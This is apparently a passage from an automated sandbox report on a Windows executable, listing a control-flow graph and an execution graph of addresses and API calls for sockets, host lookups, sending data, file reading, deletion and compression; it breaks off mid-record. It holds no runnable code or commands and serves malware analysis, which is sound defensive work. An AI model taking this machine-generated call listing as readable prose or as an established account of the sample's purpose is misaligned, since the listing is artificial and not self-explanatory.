                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 48 40106c-401093 6CF6AC91
                                                                              APIs
                                                                              • 6CF6AC91.MSVBVM60(VB5!6&*), ref: 00401071
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1800902274.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1800868441.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1800902274.0000000000404000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1800946068.0000000000406000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1801134772.0000000000407000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: VB5!6&*
                                                                              • API String ID: 0-3593831657
                                                                              • Opcode ID: 0d679d7b5848a2acb40e1ea1edcc93dab6ddb27ce25793bf670446894b227192
                                                                              • Instruction ID: 18f867a201762634ffe404bcbec6099778bc674ab8fe3e8a06483c959477a87b
                                                                              • Opcode Fuzzy Hash: 0d679d7b5848a2acb40e1ea1edcc93dab6ddb27ce25793bf670446894b227192
                                                                              • Instruction Fuzzy Hash: EAD04E2108E7C68EC307077088209803FB48C1321030B02E3C1C8DE8B3C26D084DC723

                                                                              Execution Graph

                                                                              Execution Coverage:2.9%
                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                              Signature Coverage:32.5%
                                                                              Total number of Nodes:1459
                                                                              Total number of Limit Nodes:7
                                                                              execution_graph 6136 409ac0 lstrcpy CreateFontIndirectA 6137 409b57 6136->6137 6138 409dba 6136->6138 6141 409b5d 6137->6141 6152 409cba 6137->6152 6139 409dc1 6138->6139 6140 409e09 LoadCursorA GetStockObject RegisterClassA 6138->6140 6142 40a110 6139->6142 6149 409de4 EndDialog 6139->6149 6143 409f36 CreateWindowExA 6140->6143 6144 409e76 LoadCursorA GetStockObject RegisterClassA 6140->6144 6145 409b66 6141->6145 6146 409c9d InvalidateRect 6141->6146 6158 409f75 6143->6158 6144->6143 6148 409ecd CreateWindowExA CreateWindowExA 6144->6148 6145->6142 6147 409b6f 73A1A570 SetBkMode GetObjectA SelectObject SetTextColor 6145->6147 6150 409bf4 TextOutA 6147->6150 6151 409bae GetObjectA 6147->6151 6148->6158 6157 409c26 6150->6157 6155 409bbf SelectObject 73A24D40 DeleteDC 6151->6155 6152->6142 6156 409cf3 9 API calls 6152->6156 6153 40a097 73A1A570 6168 408f00 CreateFileA 6153->6168 6154 40a087 free 6154->6153 6155->6150 6160 409d71 TextOutA 6156->6160 6162 409c86 6157->6162 6163 409c38 GetObjectA 6157->6163 6158->6142 6158->6153 6158->6154 6165 40a0c1 GetObjectA 6158->6165 6164 409dab 6160->6164 6166 409c49 SelectObject 73A24D40 DeleteDC 6163->6166 6165->6158 6167 40a0eb ShowWindow ShowWindow 6165->6167 6166->6162 6167->6142 6169 408fdb 6168->6169 6170 408f2c GetFileSize 6168->6170 6169->6158 6171 408f50 malloc 6170->6171 6172 408f42 CloseHandle 6170->6172 6173 408f60 CloseHandle 6171->6173 6174 408f6e ReadFile CloseHandle 6171->6174 6172->6158 6173->6158 6175 408fd1 free 6174->6175 6176 408f8d 6174->6176 6175->6169 6176->6175 6177 408fa4 free 6176->6177 6177->6158 6191 409080 CreateFontIndirectA 6192 409340 6191->6192 6193 4090e8 6191->6193 6194 409169 6192->6194 6198 40935c EndDialog 6192->6198 6195 409235 9 API calls 6193->6195 6196 4090ee 6193->6196 6197 409178 NtdllDefWindowProc_A 6194->6197 6206 4092ec TextOutA 6195->6206 6199 4090f7 6196->6199 6203 40919d 6196->6203 6198->6197 6199->6194 6200 4090fc 73A1A570 SetBkMode 6199->6200 6200->6194 6201 40911e GetObjectA 6200->6201 6205 409133 SelectObject 73A24D40 DeleteDC 6201->6205 6203->6194 6204 4091ef CreateWindowExA 6203->6204 6204->6194 6204->6203 6205->6194 6206->6194 6350 4093c0 6351 4098dc 6350->6351 6352 4094ad 6350->6352 6354 409a88 NtdllDefWindowProc_A 6351->6354 6358 409969 6351->6358 6365 409922 6351->6365 6352->6351 6353 4094b3 6352->6353 6355 40960f 73A1A570 SetBkMode 6353->6355 6360 4094bc 6353->6360 6356 40962e 6355->6356 6357 4096df 6355->6357 6356->6357 6359 40963b GetObjectA 6356->6359 6361 4097fd 6357->6361 6363 4096f9 GetObjectA 6357->6363 6370 409981 6358->6370 6374 4099da 6358->6374 6364 409650 SelectObject GetPixel 6359->6364 6360->6354 6362 409555 6360->6362 6378 4094fa 6360->6378 6367 409817 GetObjectA 6361->6367 6375 4098cf 6361->6375 6366 4095ce 6362->6366 6385 40956d 6362->6385 6373 40970e SelectObject GetPixel 6363->6373 6405 408ff0 6364->6405 6365->6354 6369 40992e ScrollWindow InvalidateRect InvalidateRect 6365->6369 6371 4095ed 6366->6371 6372 4095dd InvalidateRect 6366->6372 6382 40982c SelectObject GetPixel 6367->6382 6369->6354 6370->6354 6377 40999f ScrollWindow InvalidateRect InvalidateRect 6370->6377 6371->6354 6381 4095fa InvalidateRect 6371->6381 6372->6371 6379 409736 6373->6379 6380 409758 6373->6380 6374->6354 6374->6375 6397 409a27 ScrollWindow InvalidateRect InvalidateRect 6374->6397 6375->6354 6377->6354 6386 409503 6378->6386 6387 409529 6378->6387 6388 408ff0 2 API calls 6379->6388 6389 408ff0 2 API calls 6380->6389 6401 409786 6380->6401 6381->6354 6383 408ff0 2 API calls 6382->6383 6390 409871 6383->6390 6384 408ff0 2 API calls 6392 4096ce DeleteDC 6384->6392 6393 40958c 6385->6393 6394 4095ad 6385->6394 6386->6354 6395 409510 InvalidateRect 6386->6395 6387->6354 6396 40953c InvalidateRect 6387->6396 6388->6380 6389->6401 6400 4098c1 DeleteDC 6390->6400 6402 408ff0 2 API calls 6390->6402 6391 4097ed DeleteDC 6391->6361 6392->6357 6393->6354 6398 409594 InvalidateRect 6393->6398 6394->6354 6399 4095b5 InvalidateRect 6394->6399 6395->6354 6396->6354 6397->6374 6398->6354 6399->6354 6400->6375 6401->6391 6403 408ff0 2 API calls 6401->6403 6404 4098be 6402->6404 6403->6401 6404->6400 6407 409071 6405->6407 6409 408ff8 6405->6409 6406 409028 GetPixel 6408 409037 73A24D40 6406->6408 6406->6409 6407->6384 6408->6409 6409->6406 6409->6407 5971 40f203 5972 40f25d 5971->5972 6003 401320 5972->6003 5976 40f2ec 5977 40f30a 5976->5977 5979 40edd0 4 API calls 5976->5979 5978 40f353 5977->5978 5980 40eec0 3 API calls 5977->5980 6011 401690 5978->6011 5979->5977 5987 40f323 5980->5987 5982 40f35d 5983 40f395 5982->5983 5985 40edd0 4 API calls 5982->5985 5989 40f377 5982->5989 5986 40edd0 4 API calls 5983->5986 5983->5989 5984 40edd0 4 API calls 5984->5987 5985->5983 5986->5989 5987->5978 5987->5984 5988 40f402 5992 40f3ce 5988->5992 5993 40edd0 4 API calls 5988->5993 5989->5988 5990 40edd0 4 API calls 5989->5990 5989->5992 5990->5988 5991 40f463 5996 40edd0 4 API calls 5991->5996 5998 40f445 5991->5998 5992->5991 5994 40edd0 4 API calls 5992->5994 5992->5998 5993->5992 5994->5991 5995 40f49c 5999 40edd0 4 API calls 5995->5999 5996->5998 5997 40f4d5 5997->5995 6001 40edd0 4 API calls 5997->6001 5998->5995 5998->5997 6000 40edd0 4 API calls 5998->6000 6002 40f50b 5999->6002 6000->5997 6001->5995 6004 40132b 6003->6004 6006 40133a 6004->6006 6024 40f070 fprintf 6004->6024 6006->5976 6007 40edd0 6006->6007 6008 40edea 6007->6008 6009 40edd9 6007->6009 6008->5976 6010 40ee70 4 API calls 6009->6010 6010->6008 6012 4016a9 6011->6012 6022 4016b1 6011->6022 6025 4019a0 6012->6025 6014 4016ae 6014->5982 6015 401982 6018 40c840 4 API calls 6015->6018 6016 40196b 6035 40c840 6016->6035 6020 40198f 6018->6020 6020->5982 6021 401943 6021->6015 6021->6016 6022->6021 6023 40c840 _write _write fprintf perror 6022->6023 6023->6022 6026 401ba0 6025->6026 6033 4019ba 6025->6033 6027 401bb5 6026->6027 6028 401bca 6026->6028 6030 40c840 4 API calls 6027->6030 6029 40c840 4 API calls 6028->6029 6031 401bd7 6029->6031 6032 401bc6 6030->6032 6031->6014 6032->6014 6033->6026 6034 40c840 4 API calls 6033->6034 6034->6033 6036 40c85e 6035->6036 6037 40c8f5 6036->6037 6038 40c8c3 6036->6038 6039 40c921 6037->6039 6040 40c8ff 6037->6040 6055 401030 6038->6055 6043 401030 4 API calls 6039->6043 6042 401030 4 API calls 6040->6042 6045 40c908 6042->6045 6046 40c92a 6043->6046 6044 40c8cf 6062 401200 6044->6062 6075 40d2a0 6045->6075 6081 40cf60 6046->6081 6051 40d2a0 4 API calls 6053 40c8f0 6051->6053 6052 40197c 6052->5982 6053->6052 6094 401130 6053->6094 6056 40104b 6055->6056 6057 4010ef 6055->6057 6058 40edd0 4 API calls 6056->6058 6059 40109d 6056->6059 6061 40107a 6056->6061 6057->6044 6058->6059 6060 40edd0 4 API calls 6059->6060 6059->6061 6060->6061 6061->6044 6063 401130 4 API calls 6062->6063 6065 401206 6063->6065 6064 40130e 6064->6053 6066 401247 6065->6066 6067 40edd0 4 API calls 6065->6067 6068 401274 6065->6068 6070 401229 6065->6070 6066->6070 6071 40edd0 4 API calls 6066->6071 6067->6066 6068->6064 6072 40edd0 4 API calls 6068->6072 6069 4012b1 6069->6068 6074 40edd0 4 API calls 6069->6074 6070->6068 6070->6069 6073 40edd0 4 API calls 6070->6073 6071->6070 6072->6068 6073->6069 6074->6068 6078 40d2bc 6075->6078 6079 40d3d3 6075->6079 6076 401030 4 API calls 6077 40d3ee 6076->6077 6077->6053 6078->6079 6080 401030 _write _write fprintf perror 6078->6080 6079->6076 6080->6078 6082 401030 4 API calls 6081->6082 6083 40cf76 6082->6083 6084 401030 4 API calls 6083->6084 6085 40cf85 6084->6085 6086 401030 4 API calls 6085->6086 6090 40cf94 6086->6090 6087 40cfbf 6101 40cfe0 6087->6101 6088 401030 4 API calls 6088->6090 6090->6087 6090->6088 6092 40cfe0 4 API calls 6093 40c941 6092->6093 6093->6051 6097 40113a 6094->6097 6098 401196 6094->6098 6095 401146 6095->6052 6096 4011df 6096->6052 6097->6095 6097->6098 6099 40edd0 4 API calls 6097->6099 6098->6096 6100 40edd0 4 API calls 6098->6100 6099->6098 6100->6096 6104 40d001 6101->6104 6102 40cfcb 6102->6092 6103 401030 _write _write fprintf perror 6103->6104 6104->6102 6104->6103 6421 40e790 6422 40e7b7 6421->6422 6423 40e836 6422->6423 6424 40e85c 6422->6424 6450 406850 6423->6450 6426 40e83b 6424->6426 6427 40e86c 6424->6427 6431 40e951 6426->6431 6458 40f070 fprintf 6426->6458 6429 40e8d6 fprintf 6427->6429 6434 40e8f6 6427->6434 6457 40f070 fprintf 6429->6457 6436 40ea11 6431->6436 6439 40e96e 6431->6439 6432 40e94c 6433 40ee10 4 API calls 6432->6433 6433->6431 6434->6432 6435 40ed10 11 API calls 6434->6435 6442 40ee10 4 API calls 6434->6442 6435->6434 6438 40ed10 11 API calls 6436->6438 6441 40e9a8 6436->6441 6437 40ed10 11 API calls 6437->6439 6438->6436 6439->6437 6439->6441 6440 40eadf 6446 40eaf4 6440->6446 6460 40f070 fprintf 6440->6460 6441->6440 6459 40f070 fprintf 6441->6459 6442->6434 6444 40eb78 6446->6444 6447 40eba0 fprintf 6446->6447 6448 40eb4d 6446->6448 6448->6444 6449 40eb55 fprintf 6448->6449 6449->6444 6461 406760 6450->6461 6452 406879 6453 4068ac 6452->6453 6454 406760 11 API calls 6452->6454 6456 4068a8 6452->6456 6455 40ee10 4 API calls 6453->6455 6454->6452 6455->6456 6456->6426 6462 4067b5 6461->6462 6466 406773 6461->6466 6464 40680a 6462->6464 6465 40ed10 11 API calls 6462->6465 6463 40ed10 11 API calls 6463->6466 6464->6452 6465->6462 6466->6462 6466->6463 6342 40f711 _exit 6467 406392 6468 4063a2 6467->6468 6469 406398 6467->6469 6470 405ac0 free 6469->6470 6470->6468 5154 406654 5155 40667d 5154->5155 5156 40665e fprintf 5154->5156 5158 405ac0 5156->5158 5159 405ae5 5158->5159 5160 405ac8 5158->5160 5159->5155 5161 405ad0 free 5160->5161 5161->5161 5162 405ae2 5161->5162 5162->5155 5163 406060 5179 405630 5163->5179 5165 4060de 5166 405630 2 API calls 5165->5166 5178 406183 5165->5178 5167 40611f 5166->5167 5168 406141 5167->5168 5169 406129 5167->5169 5186 405af0 5168->5186 5171 405ac0 free 5169->5171 5173 406133 5171->5173 5174 406161 5175 405ac0 free 5176 406179 5175->5176 5177 405ac0 free 5176->5177 5177->5178 5184 405657 5179->5184 5180 405670 5180->5165 5181 405859 malloc 5182 405a96 5181->5182 5181->5184 5183 405aab 5182->5183 5185 405ac0 free 5182->5185 5183->5165 5184->5180 5184->5181 5185->5183 5190 405b30 5186->5190 5187 405ea7 5187->5174 5187->5175 5188 40ee10 _write _write fprintf perror 5188->5190 5189 40ed10 11 API calls 5189->5190 5190->5187 5190->5188 5190->5189 5191 408a60 5197 408290 time srand 5191->5197 5193 408a6f 5194 408a8b CloseHandle 5193->5194 5244 406930 vsprintf 5193->5244 5198 4082c0 EndDialog 5197->5198 5199 4082d8 5197->5199 5198->5193 5200 406930 9 API calls 5199->5200 5201 4082eb socket 5200->5201 5202 408307 5201->5202 5203 40832c 5201->5203 5249 406a40 vsprintf 5202->5249 5252 408200 5203->5252 5208 408396 5211 4083c1 gethostbyname 5208->5211 5213 4083a9 inet_addr 5208->5213 5209 40835e 5210 406a40 2 API calls 5209->5210 5212 408368 EndDialog closesocket 5210->5212 5214 4083d0 rand 5211->5214 5215 408405 5211->5215 5212->5193 5216 408471 htons connect 5213->5216 5220 40845d 5214->5220 5218 408426 gethostbyname 5215->5218 5219 408419 inet_addr 5215->5219 5222 4088e4 5216->5222 5218->5220 5221 40842f rand 5218->5221 5219->5216 5220->5216 5221->5220 5224 406930 9 API calls 5222->5224 5225 4088f7 5224->5225 5226 408904 htonl 5225->5226 5260 407180 5226->5260 5228 408940 5231 4089ae closesocket 5228->5231 5236 406930 9 API calls 5228->5236 5229 40892f 5229->5228 5267 4070b0 5229->5267 5232 4089e0 5231->5232 5233 4089cf _close 5231->5233 5280 4080d0 5232->5280 5275 406e30 5233->5275 5238 408971 5236->5238 5237 4089e8 EndDialog 5237->5193 5239 40897e htonl 5238->5239 5240 407180 4 API calls 5239->5240 5241 40899a 5240->5241 5241->5231 5242 4070b0 194 API calls 5241->5242 5243 4089ab 5242->5243 5243->5231 5245 406a36 5244->5245 5246 406959 SendDlgItemMessageA SendDlgItemMessageA 5244->5246 5245->5194 5247 406a07 SendDlgItemMessageA SendDlgItemMessageA 5246->5247 5248 40699d SendDlgItemMessageA SendDlgItemMessageA SendDlgItemMessageA SendDlgItemMessageA 5246->5248 5247->5245 5248->5247 5250 406a65 MessageBoxA 5249->5250 5251 406a8a EndDialog 5249->5251 5250->5251 5251->5193 5253 40823f 5252->5253 5254 408257 5253->5254 5255 40824a WSAGetLastError 5253->5255 5257 408277 WSAGetLastError 5254->5257 5259 408284 bind 5254->5259 5256 406930 9 API calls 5255->5256 5256->5254 5258 406930 9 API calls 5257->5258 5258->5259 5259->5208 5259->5209 5261 4071ab 5260->5261 5264 40718b 5260->5264 5261->5229 5262 407195 send 5263 4071b1 WSAGetLastError 5262->5263 5262->5264 5265 406a40 2 API calls 5263->5265 5264->5261 5264->5262 5266 4071c2 5265->5266 5266->5229 5268 407179 5267->5268 5271 4070c5 5267->5271 5268->5228 5269 407144 5269->5268 5270 407155 MessageBoxA 5269->5270 5270->5268 5271->5269 5274 407140 5271->5274 5302 406c50 _write _ftol SendMessageA 5271->5302 5307 406e90 5271->5307 5274->5228 5784 402540 5275->5784 5277 406e79 5277->5232 5278 406e49 5278->5277 5279 406e5b _chmod remove 5278->5279 5279->5277 5281 4080d9 5280->5281 5282 406930 9 API calls 5281->5282 5283 4080ee 5282->5283 5788 407d50 SendMessageA 5283->5788 5285 4081e2 5285->5237 5286 4080ff 5286->5285 5287 406930 9 API calls 5286->5287 5288 408129 5287->5288 5289 407d50 89 API calls 5288->5289 5290 40813a 5289->5290 5290->5285 5291 406930 9 API calls 5290->5291 5292 408164 5291->5292 5293 407d50 89 API calls 5292->5293 5294 408175 5293->5294 5294->5285 5295 406930 9 API calls 5294->5295 5296 40819a 5295->5296 5297 407d50 89 API calls 5296->5297 5298 4081ab 5297->5298 5298->5285 5299 406930 9 API calls 5298->5299 5300 4081d1 5299->5300 5301 407d50 89 API calls 5300->5301 5301->5285 5303 406cb2 _close 5302->5303 5305 406d01 5302->5305 5323 406b80 5303->5323 5305->5271 5306 406cd2 5306->5271 5308 406e9f 5307->5308 5313 406ec6 5307->5313 5309 407011 htonl 5308->5309 5310 406ea6 htonl 5308->5310 5311 406f0e 5308->5311 5312 406f7e htonl 5308->5312 5308->5313 5309->5313 5310->5313 5774 406aa0 strchr 5311->5774 5314 406fa0 5312->5314 5313->5271 5315 406930 9 API calls 5314->5315 5316 406fe1 _ftol SendMessageA 5315->5316 5316->5271 5318 406f3e sprintf 5319 406e30 3 API calls 5318->5319 5320 406f60 5319->5320 5321 402500 _open 5320->5321 5322 406f74 5321->5322 5322->5271 5324 406b98 5323->5324 5330 402df0 5324->5330 5327 406c2f 5327->5306 5328 406a40 2 API calls 5329 406c23 5328->5329 5329->5306 5365 40eec0 strrchr 5330->5365 5334 402e6e strncmp 5336 402ea4 strncmp 5334->5336 5339 402ebf strncpy 5334->5339 5336->5339 5388 402dc0 5339->5388 5340 403186 5343 4031ca fprintf 5340->5343 5351 4031c3 5340->5351 5342 402fd4 atoi 5353 402f92 5342->5353 5402 4055b0 5343->5402 5346 403129 fprintf 5400 403380 fprintf 5346->5400 5350 402dc0 10 API calls 5350->5353 5352 403298 5351->5352 5357 403219 5351->5357 5462 403500 5352->5462 5353->5340 5353->5342 5353->5346 5353->5350 5354 4055b0 free free 5353->5354 5391 4033b0 fprintf 5353->5391 5396 403410 fprintf 5353->5396 5399 403470 6 API calls 5353->5399 5401 403380 fprintf 5353->5401 5354->5353 5356 40326c 5363 403296 5356->5363 5408 403810 5356->5408 5357->5356 5360 403245 _fileno _setmode 5357->5360 5359 4032bd 5361 4055b0 2 API calls 5359->5361 5360->5356 5362 4032cc 5361->5362 5362->5327 5362->5328 5363->5359 5494 404bb0 5363->5494 5366 40eed8 5365->5366 5367 40eedb strrchr 5365->5367 5366->5367 5368 40eee7 5367->5368 5369 40eeea strrchr 5367->5369 5368->5369 5370 402e00 5369->5370 5371 40ef00 getenv 5370->5371 5372 40ef25 5371->5372 5373 40ef2b 5371->5373 5372->5334 5520 40f1d0 malloc 5373->5520 5375 40efab free 5375->5334 5376 40ef74 strspn 5377 40efa7 5376->5377 5378 40ef8a strcspn 5376->5378 5377->5375 5379 40efbd calloc 5377->5379 5380 40ef3c 5378->5380 5381 40efdc 5379->5381 5383 40efe6 5379->5383 5380->5375 5380->5376 5380->5377 5524 40f070 fprintf 5381->5524 5384 40f00a 5383->5384 5525 40f070 fprintf 5383->5525 5386 40f046 5384->5386 5387 40f01f strspn 5384->5387 5386->5334 5387->5384 5527 4025e0 5388->5527 5390 402de0 5390->5353 5557 403380 fprintf 5391->5557 5393 4033e6 5394 40340d 5393->5394 5395 4033ef fprintf 5393->5395 5394->5353 5395->5394 5395->5395 5397 403468 5396->5397 5398 40344a fprintf 5396->5398 5397->5353 5398->5397 5398->5398 5399->5353 5400->5353 5401->5353 5403 4055ba 5402->5403 5404 4055fc 5402->5404 5405 4055e3 5403->5405 5406 4055d3 free 5403->5406 5404->5351 5405->5404 5407 4055ec free 5405->5407 5406->5405 5407->5404 5409 403826 5408->5409 5410 403851 5409->5410 5411 403867 5409->5411 5412 403500 54 API calls 5410->5412 5558 403ef0 5411->5558 5414 40385c 5412->5414 5414->5356 5415 403872 5416 4038f9 5415->5416 5417 4038b8 5415->5417 5418 40388d 5415->5418 5420 403917 5416->5420 5422 40395c 5416->5422 5417->5356 5418->5417 5419 4038af fprintf 5418->5419 5419->5417 5420->5417 5421 40391f fprintf 5420->5421 5421->5417 5424 40399e 5422->5424 5572 404200 5422->5572 5424->5417 5425 4039ea _open 5424->5425 5426 403a08 fprintf perror 5425->5426 5428 403a40 5425->5428 5426->5356 5427 403a80 5431 403a8d 5427->5431 5432 403aaf 5427->5432 5428->5427 5583 404400 5428->5583 5430 403a60 5430->5427 5433 403a6c _close 5430->5433 5434 404bb0 21 API calls 5431->5434 5435 403ad7 5432->5435 5436 403abe _fileno 5432->5436 5433->5356 5437 403a9a _close 5434->5437 5649 403d40 5435->5649 5440 403b29 5436->5440 5437->5356 5439 403b9e 5443 403c0f 5439->5443 5445 403c19 _close 5439->5445 5450 404400 25 API calls 5439->5450 5440->5439 5441 403b84 fprintf 5440->5441 5441->5439 5442 403adc 5442->5417 5442->5440 5444 403b04 fprintf 5442->5444 5443->5445 5444->5440 5446 403c34 _close 5445->5446 5447 403c48 5445->5447 5446->5447 5448 403c43 5446->5448 5449 403c51 5447->5449 5454 403c70 5447->5454 5666 40f100 fprintf perror 5448->5666 5449->5417 5452 403c5d _unlink 5449->5452 5450->5439 5452->5356 5453 403d20 5453->5417 5673 4053d0 5453->5673 5454->5453 5455 403c84 fprintf 5454->5455 5456 403c9a 5454->5456 5457 403ce1 5455->5457 5667 40f130 5456->5667 5459 403d0d fprintf 5457->5459 5461 403cf4 fprintf 5457->5461 5459->5453 5461->5459 5463 40359e 5462->5463 5464 40351e 5462->5464 5465 4035b9 _fileno _setmode 5463->5465 5467 4035d0 5463->5467 5464->5463 5466 403537 _fileno _isatty 5464->5466 5465->5467 5466->5463 5468 403548 fprintf fprintf 5466->5468 5469 403609 5467->5469 5471 4035f0 _fileno _setmode 5467->5471 5475 4055b0 2 API calls 5468->5475 5470 40365f _fileno _fstat 5469->5470 5477 403687 5469->5477 5472 40367d 5470->5472 5470->5477 5471->5469 5773 40f070 fprintf 5472->5773 5475->5463 5476 4036e1 5478 403706 _fileno _fileno 5476->5478 5479 4036ec 5476->5479 5477->5476 5480 404400 25 API calls 5477->5480 5486 403728 5478->5486 5481 404bb0 21 API calls 5479->5481 5482 4036ca 5480->5482 5483 4036ff 5481->5483 5482->5476 5484 4055b0 2 API calls 5482->5484 5483->5363 5484->5476 5485 4037a3 5487 4037b3 fprintf 5485->5487 5488 4037ca 5485->5488 5493 40379f 5485->5493 5486->5485 5489 404400 25 API calls 5486->5489 5491 40376f _fileno _fileno 5486->5491 5486->5493 5487->5363 5490 40f130 3 API calls 5488->5490 5488->5493 5489->5486 5492 4037f4 fprintf 5490->5492 5491->5486 5492->5493 5493->5363 5495 404bc6 5494->5495 5496 404d29 5494->5496 5498 404bce 5495->5498 5508 404d31 5495->5508 5497 404c06 5496->5497 5496->5508 5502 404ce5 ctime 5497->5502 5506 404c34 _lseek 5497->5506 5500 404be1 printf 5498->5500 5501 404bef 5498->5501 5499 404e31 5499->5359 5500->5501 5501->5497 5505 404bf8 printf 5501->5505 5503 404db1 5502->5503 5504 404d0a printf 5502->5504 5507 404db7 printf 5503->5507 5504->5507 5505->5497 5506->5502 5509 404c54 _read 5506->5509 5510 404dd9 5507->5510 5508->5499 5511 404d76 printf 5508->5511 5512 404d86 5508->5512 5513 404c74 5509->5513 5514 404c6f 5509->5514 5518 40f130 3 API calls 5510->5518 5511->5512 5515 40f130 3 API calls 5512->5515 5513->5502 5516 40f0a0 8 API calls 5514->5516 5517 404da1 printf 5515->5517 5516->5513 5517->5359 5519 404e21 printf 5518->5519 5519->5499 5521 40f1ef 5520->5521 5522 40f1e5 5520->5522 5521->5380 5526 40f070 fprintf 5522->5526 5528 402602 5527->5528 5532 402626 5527->5532 5529 402656 getenv 5528->5529 5528->5532 5529->5532 5530 402b3b 5533 402c72 5530->5533 5542 402b7f 5530->5542 5531 402735 5531->5390 5532->5530 5532->5531 5536 402836 strncmp 5532->5536 5541 40288c 5532->5541 5546 402a90 5532->5546 5534 402c9a 5533->5534 5535 402c7a fprintf 5533->5535 5534->5390 5535->5534 5536->5532 5537 402b1a 5537->5390 5538 402ac0 5538->5537 5539 402afb fprintf 5538->5539 5540 402adf fprintf 5538->5540 5539->5537 5540->5537 5545 40290d 5541->5545 5548 4028a9 5541->5548 5543 402b93 5542->5543 5544 402c0b fprintf 5542->5544 5543->5390 5544->5543 5545->5546 5547 402915 5545->5547 5546->5530 5546->5538 5549 4029f8 5547->5549 5550 40292e 5547->5550 5551 4028e1 5548->5551 5552 4028b2 fprintf 5548->5552 5553 402a2a fprintf 5549->5553 5556 402932 5549->5556 5554 4029b2 fprintf 5550->5554 5555 402995 fprintf 5550->5555 5550->5556 5551->5390 5552->5551 5553->5556 5554->5556 5555->5556 5556->5390 5557->5393 5689 4040a0 _errno _stat 5558->5689 5560 403f2c 5561 403f33 5560->5561 5562 403f45 _errno 5560->5562 5563 404076 perror 5560->5563 5561->5415 5562->5563 5564 403f54 5562->5564 5563->5415 5690 4040c0 5564->5690 5568 403fec 5569 404042 5568->5569 5570 404049 5568->5570 5695 4040a0 _errno _stat 5568->5695 5569->5415 5570->5563 5573 4040c0 _strlwr 5572->5573 5574 404232 5573->5574 5575 404244 5574->5575 5579 40435d 5574->5579 5576 4042c4 _strlwr 5575->5576 5577 404248 5575->5577 5582 4042d5 5576->5582 5580 4043a0 5577->5580 5581 40429b fprintf 5577->5581 5578 40437c fprintf 5578->5580 5579->5578 5579->5580 5580->5424 5581->5580 5582->5424 5584 404470 5583->5584 5585 404415 5583->5585 5587 40ed10 11 API calls 5584->5587 5590 40442c 5584->5590 5585->5584 5586 40441d 5585->5586 5586->5590 5696 40ed10 _errno _read 5586->5696 5587->5590 5588 40445a 5592 40463c 5588->5592 5598 404513 5588->5598 5590->5588 5591 40ed10 11 API calls 5590->5591 5591->5588 5593 404644 5592->5593 5594 40ed10 11 API calls 5592->5594 5595 404673 fprintf 5593->5595 5596 4046a7 5593->5596 5594->5593 5595->5430 5597 4046ba 5596->5597 5600 40ed10 11 API calls 5596->5600 5601 4046e9 fprintf 5597->5601 5602 40471c 5597->5602 5605 404550 5598->5605 5702 40e670 5598->5702 5600->5597 5601->5430 5606 404721 fprintf 5602->5606 5607 404758 5602->5607 5603 404b69 5610 404b71 fprintf 5603->5610 5611 404557 5603->5611 5604 404b3a fprintf 5604->5430 5605->5603 5605->5604 5605->5611 5606->5607 5612 40474f 5606->5612 5608 404765 fprintf 5607->5608 5609 4047a7 5607->5609 5608->5609 5613 40479e 5608->5613 5614 4047b5 5609->5614 5615 40ed10 11 API calls 5609->5615 5610->5611 5611->5430 5612->5430 5613->5430 5616 4047e1 5614->5616 5617 40ed10 11 API calls 5614->5617 5615->5614 5618 40480f 5616->5618 5619 40ed10 11 API calls 5616->5619 5617->5616 5620 40ed10 11 API calls 5618->5620 5621 40483d 5618->5621 5619->5618 5620->5621 5622 40487a 5621->5622 5623 40ed10 11 API calls 5621->5623 5624 40ed10 11 API calls 5622->5624 5627 40489a 5622->5627 5623->5622 5624->5627 5625 404942 5628 404955 5625->5628 5630 40ed10 11 API calls 5625->5630 5634 404a01 5625->5634 5626 4048c2 5632 4048ee 5626->5632 5635 40ed10 11 API calls 5626->5635 5627->5625 5627->5626 5629 40ed10 11 API calls 5627->5629 5633 404981 5628->5633 5639 40ed10 11 API calls 5628->5639 5629->5626 5630->5628 5631 404ac9 5637 40ed10 11 API calls 5631->5637 5641 404a91 5631->5641 5632->5625 5636 404916 fprintf 5632->5636 5643 4049af fprintf 5633->5643 5644 4049d6 5633->5644 5634->5631 5640 404a39 5634->5640 5634->5641 5635->5632 5636->5625 5637->5631 5638 40ed10 11 API calls 5638->5641 5639->5633 5642 40eec0 3 API calls 5640->5642 5641->5605 5641->5638 5645 404a43 5642->5645 5643->5644 5644->5634 5647 40ed10 11 API calls 5644->5647 5645->5641 5646 40ed10 11 API calls 5645->5646 5709 40f070 fprintf 5645->5709 5646->5645 5647->5644 5650 403d55 5649->5650 5722 405100 _errno _stat 5650->5722 5652 403d68 5653 403e10 _close 5652->5653 5654 403d81 _open 5652->5654 5665 405100 24 API calls 5652->5665 5653->5442 5655 403da5 _fstat 5654->5655 5656 403e26 perror _close 5654->5656 5657 403dbc 5655->5657 5658 403e4d fprintf perror _close _close _unlink 5655->5658 5656->5442 5660 403ecf 5657->5660 5661 403ea2 5657->5661 5662 403de3 _close _unlink 5657->5662 5747 404e70 _stat 5657->5747 5658->5442 5660->5442 5661->5660 5664 403eab fprintf 5661->5664 5749 404f70 5662->5749 5664->5660 5665->5652 5668 40f13a 5667->5668 5669 40f17b 5667->5669 5670 40f13c fputc 5668->5670 5669->5670 5672 40f1b5 fputc 5669->5672 5671 40f14c fprintf 5670->5671 5671->5457 5672->5671 5674 4053e6 5673->5674 5675 405419 5673->5675 5674->5675 5680 405401 fprintf 5674->5680 5767 405510 _utime 5675->5767 5678 405492 _chmod _unlink 5683 405504 5678->5683 5684 4054ba 5678->5684 5679 405449 5681 405452 fprintf 5679->5681 5682 40546c 5679->5682 5680->5675 5681->5682 5682->5678 5687 405488 perror 5682->5687 5683->5417 5685 4054c3 fprintf 5684->5685 5686 4054de 5684->5686 5685->5686 5686->5683 5688 4054fa perror 5686->5688 5687->5678 5688->5683 5689->5560 5691 4040d9 _strlwr 5690->5691 5693 403f5e 5691->5693 5693->5563 5694 4040a0 _errno 